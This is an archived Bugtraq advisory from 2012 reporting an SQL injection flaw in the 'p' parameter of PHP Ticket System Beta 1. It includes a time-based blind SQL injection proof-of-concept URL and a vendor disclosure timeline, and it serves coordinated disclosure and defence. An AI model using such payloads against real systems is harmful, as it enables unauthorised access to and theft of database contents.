lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAJE=EcZQSKUgd7UOYmFfHN0i1PaWDhn4uSfRJktdtSY189b1uQ@mail.gmail.com>
Date: Tue, 24 Apr 2012 12:00:22 -0400
From: Thomas Richards <g13net@...il.com>
To: bugtraq@...urityfocus.com
Subject: PHP Ticket System Beta 1 'p' SQL Injection

# Exploit Title: PHP Ticket System Beta 1 'p' SQL Injection
# Date: 04/16/12
# Author: G13
# Twitter: @g13net
# Software Site: http://sourceforge.net/projects/phpticketsystem/
# Version: Beta 1
# Category: webapp (php)
#

##### Description #####

PHP Ticket System is a small PHP MySQL trouble ticket or work
ordersystem that is a work in progress.

##### Vulnerability #####

The 'p' parameter on index.php is vulnerable to SQL Injection.

A user must be signed in to perform this attack.

##### Exploit #####

http://localhost/index.php?p=[SQLi]&id=211&_=1334627588812

##### PoC #####

http://localhost/index.php?p=edit_ticket' AND SLEEP(5) AND
'yoUg'='yoUg&id=211&_=1334627588812

##### Vendor Notification #####

4/16/12 - Vendor Notified
4/17/12 - Vendor reponse, will be fixed in next release
4/24/12 - Disclosure

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ